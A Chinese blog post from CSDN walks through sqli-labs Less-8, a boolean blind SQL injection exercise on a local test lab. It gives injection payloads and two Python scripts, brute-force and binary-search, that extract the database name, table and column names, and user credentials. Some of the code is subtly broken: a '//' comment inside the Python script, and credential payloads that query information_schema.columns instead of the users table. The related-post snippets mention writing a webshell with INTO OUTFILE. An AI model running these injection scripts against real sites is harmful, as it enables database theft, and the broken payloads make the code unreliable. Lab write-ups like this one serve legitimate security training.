sqli-labs注入漏洞解析--less-8

最新推荐文章于 2024-09-10 20:49:26 发布
最新推荐文章于 2024-09-10 20:49:26 发布
阅读量954 收藏 13
点赞数 24
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/duoba_an/article/details/140912921
版权

Less-8(布尔盲注)

进入之后说请输入id,那就试一下

显示You are in........好像没什么发现。再试试有没有其他的注入点

再输入id=1’后回显消失了。再输入其他的都是一样的结果,这里怀疑单引号后边有注入点

输入id=1' order by 1 --+后有了回显,再陆续试了2 3 4,当输入4时没有了回显

他只有对和错显示,那我们只能用对或者错误来猜他这个数据库,到了这里基本可以判断出是布尔盲注,那就试一下

布尔盲注的主要三个函数:length(),ascii(),substr()

?id=1%27%20and%20ascii(substr(database(),1,1))>114--+

?id=1%27%20and%20ascii(substr(database(),1,1))>115--+

ascii码表

https://picx.zhimg.com/70/v2-5ffbc3719a99246db040f0a068ad2ef5_1440w.avis?source=172ae18b&biz_tag=Post

我用ASCII来猜,用substr来截取他的第一个字段,如果我猜对了,他就正常显示,如果我猜错了,他就没有显示,就像上边的,当我猜到第114个时显示正常,当为115时没有显示,说明我就猜出来他的第一个字段的ASCII是115,然后在对照查询ASCII表就能找出来以此类推,就能猜出来,但是这样效率太低,所以写一个脚本来执行:

import requests

url = "http://127.0.0.1/sqli-labs-php7-master/Less-8/index.php"

def inject_database(url):
    name = ''
    for i in range(1,20):
        for j in range(32,129):
            payload = "1' and ascii(substr(database(),%d,1)) = %d-- " % (i, j)
            res = {"id":payload}
            r = requests.get(url,params=res)
            if "You are in..........." in r.text:
                name +=chr(j)
                print(name)
                break
            else:
                continue

inject_database(url)

暴力破解也是将库名给爆出来了,但是这个办法比较慢,因为他要一个一个试

换一种思路:用二分法来取值

Low为32,mid初始值为80,当执行到判断if后没有出现you are in,则执行low =mid+1,low变为81,mid为104,直到出现you are in 时ASCII为115,跳出循环,可以判断出第一个字符为115,对应的就是s

import requests

url = "http://127.0.0.1/sqli-labs-php7-master/Less-8/index.php"

def inject_database(url):
    name=""
    for i in range(1,20): //这里1,20表示我们测试库名的字段长度再爆表时可以适当调节长度,这里写20是为了缩短比较的时间。
        low =32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url,params=params)
            if 'You are in...........' in r.text:
                 low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name += chr(mid)
        print(name)

inject_database(url)

这样我们就判断出库名为sucerity。后边的就是表和列的查询,和之前的都一样,只不过这里是要用ASCII码来猜而已,就是有点慢。

爆表

payload = "1' and ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema='security'),%d,1)) > %d-- " % (i, mid)

爆字段

payload = "1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d-- " % (i, mid)

爆数据

username

payload = "1' and ascii(substr((select group_concat(username) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d-- " % (i, mid)

password

payload = "1' and ascii(substr((select group_concat(password) from information_schema.columns where table_schema='security'and table_name='users'),%d,1)) > %d-- " % (i, mid)

成功拿下。

duoba_an
关注
  • 24
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs注入漏洞解析--less-7
duoba_an的博客
02-27 1131
我们先看一下第七关页面显示use outfile意思是利用文件上传来做,outfile是将检索到的数据,保存到服务器的文件内:格式:select * into outfile "文件地址"示例:secure_file_priv参数用于限制LOAD DATA, SELECT …LOAD_FILE()传到哪个指定目录。secure_file_priv 为 'NULL' 时,表示限制mysqld不允许导入或导出。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sqli-labs注入漏洞解析--less-46
duoba_an的博客
02-26 2724
在MySQL支持使用ORDER BY语句对查询结果集进行排序处理,使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。语法格式如下select * from 表名 order by 列名(或者数字) asc;升序(默认升序)select * from 表名 order by 列名(或者数字) desc;降序假设有以下用户表当我们使用命令的时候,是将users这张表按照username这一列进行升序,结果就变成了;
sqli-labs注入漏洞解析--less-5
duoba_an的博客
02-26 414
1.进入第五关我们先看提示2.还是说让我们输入一个id数字,那我们就输入一个先看一下3.根据页面结果得知虽然有显示,但是和前面四关还是不一样是因为页面虽然有东西。但是只有对于请求出错显示,其余的就没有了。这个时候我们用联合查询就没有用,因为联合查询是需要页面有回显位。如果数据 不显示只有对错页面显示我们可以选择报错注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
Sqli-labs靶场第7关详解[Sqli-labs-less-7]
m0_73615178的博客
02-22 2015
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQL注入 sqli-labs部分解析
ziwenya的博客
08-31 637
sql注入基础操作及相关sqli-labs关卡通关流程
最详细sqli-labs平台前十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3304
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1708
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
pandas读取xlsx文件使用sqlachemy写到数据库
ithongchou的博客
09-10 295
如果你使用的是特定的数据库(如 SQLite、PostgreSQL、MySQL),你还需要安装相应的数据库驱动。通过这些步骤,你可以方便地将 Excel 文件中的数据写入数据库。连接字符串的格式取决于你使用的数据库。(用于读取 Excel 文件)。方法将 DataFrame 数据写入数据库。读取 Excel 文件。
【网络安全】空字节绕过:URL回调+XSS+SQL绕WAF
等风来
09-07 298
经过进一步测试,我发现WAF在解析HTTP请求时,如果发现恶意查询,会导致服务器挂起。如果我连续提交3个请求且服务器挂起,它就会阻止我的IP地址。
【PostgreSQL教程】PostgreSQL 高级篇之子查询
最新发布
No8g攻城狮的博客
09-10 232
子查询也可称为内部查询、嵌套查询,指的是在 PostgreSQL 查询中的 WHERE 子句中嵌入查询语句。一个 SELECT 语句的查询结果能够作为另一个语句的输入值。子查询可以与 SELECT、INSERT、UPDATE 和 DELETE 语句一起使用,并可使用运算符如 =、、>=、
被低估的SQL
weixin_61431494的博客
09-03 1499
虽然SQL的核心功能强大,但自定义函数和存储过程常常被低估。它们可以封装复杂的业务逻辑,从而提高数据库操作的效率和一致性。存储过程不仅可以接收参数,还能执行多条SQL语句,并处理事务。ASBEGIN-- 可能的其他初始化操作END;这种封装能够保证操作的原子性,同时提升了数据库应用的性能和安全性。
HTB-Archetype(winPEAS枚举工具,mssql xp_cmdshell)
weixin_58038441的博客
09-10 878
我们介绍了impacket中用于sql server连接工具 mssqlcilent,以及winPEAS枚举权限提升工具,以及powershell中下载文件,nc转移管理权,mssql 命令函数 xp_cmdshell 及开放命令。
基于SSM的文物管理系统(含源码+sql+视频导入教程+文档+PPT)
coderbu的博客
09-06 1275
基于SSM的文物管理系统拥有俩种角色 管理员:个人信息管理、用户管理、分类管理、文物信息管理、文物外借管理、文物维修管理、留言板管理等 用户:登录注册、分类浏览文物信息,留言评论、收藏文物等
sql 中使用like%、函数导致索引失效的解决方案
weixin_58691039的博客
09-06 797
sql 中使用like%、函数导致索引失效的解决方案全文索引与虚拟列索引
金蝶云星空查询SQL
zhanzhibo的专栏
09-10 217
税率、仓库、部门、员工、供应商、客户、物料类别、物料查询、BOM查询、辅助资料:工程项目、辅助资料:产品服务、科目、核算维度、科目余额、未转采购订单的采购申请、采购订单未完结的:待接收的、
SQL server 日常运维命令
2301_76664379的博客
09-10 1309
【代码】SQL server 日常运维命令。
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战...通过Sqli-labs的实践,读者可以增强对SQL注入漏洞的识别和防御能力,同时提升对数据库安全的理解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

duoba_an

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值